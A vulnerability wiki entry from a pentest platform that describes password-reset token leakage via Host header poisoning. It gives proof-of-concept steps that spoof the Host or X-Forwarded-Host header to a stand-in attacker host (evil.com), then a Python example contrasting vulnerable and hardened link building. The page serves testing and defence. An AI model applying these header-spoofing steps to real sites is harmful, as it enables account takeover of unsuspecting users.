Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V4 - Access Control

Weak Password Reset Implementation - Token Leakage via Host Header Poisoning

POC

1) Click on "reset password" in the application.
2) Intercept the HTTP request in Burp Suite.
3) Change the Host field to www.evilsite.com.
4) If step 3 doesn't work, add a new header X-Forwarded-Host: evil.com to the request.
5) The user receives a link like http://evil.com/reset_password/token; when they click on it, the attacker receives the password reset token and hijacks the user's account.
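The root cause is that the application builds the reset link from request headers (Host or X-Forwarded-Host) instead of from a fixed, server-side configured base URL. The following added example (written for this page, not Cobalt's code or any real application's) shows the vulnerable pattern next to the hardened one; the `headers` dict stands in for an HTTP request's headers, and ALLOWED_HOSTS, CANONICAL_BASE_URL and app.example.com are assumed configuration values.

```python
"""Added example: building a password-reset link with and without trusting
request headers. Names and hostnames below are assumptions, not from the page."""
import secrets
from urllib.parse import quote

# Assumed application configuration: the only hostname this app is served on,
# and the base URL that must appear in every outgoing reset e-mail.
ALLOWED_HOSTS = {"app.example.com"}
CANONICAL_BASE_URL = "https://app.example.com"


def generate_reset_token() -> str:
    """Unguessable single-use token; store only a hash of it server-side."""
    return secrets.token_urlsafe(32)


def vulnerable_reset_link(headers: dict, token: str) -> str:
    """Vulnerable pattern: the link's host is whatever the request claimed.

    Many frameworks honour X-Forwarded-Host ahead of Host when building
    'absolute' URLs, so either header ends up in the e-mailed link.
    """
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    return f"https://{host}/reset_password/{quote(token, safe='')}"


def safe_reset_link(headers: dict, token: str) -> str:
    """Hardened pattern: the link never depends on request headers.

    The Host header is validated against an allowlist purely to reject
    requests that arrive under an unexpected name; X-Forwarded-Host is
    ignored entirely, and the link uses the configured canonical base URL.
    """
    host = headers.get("Host", "")
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"Host header {host!r} is not an allowed host")
    return f"{CANONICAL_BASE_URL}/reset_password/{quote(token, safe='')}"


if __name__ == "__main__":
    token = generate_reset_token()
    spoofed = {"Host": "app.example.com", "X-Forwarded-Host": "evil.com"}
    print("vulnerable:", vulnerable_reset_link(spoofed, token))
    print("hardened:  ", safe_reset_link(spoofed, token))
```

With the spoofed headers the vulnerable function emits a link pointing at evil.com, while the hardened one emits the canonical link regardless of what the request carried; a request whose Host is not on the allowlist is rejected outright, which is also a useful point to log for detection of header-poisoning attempts.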

Impact

High

Likelihood

High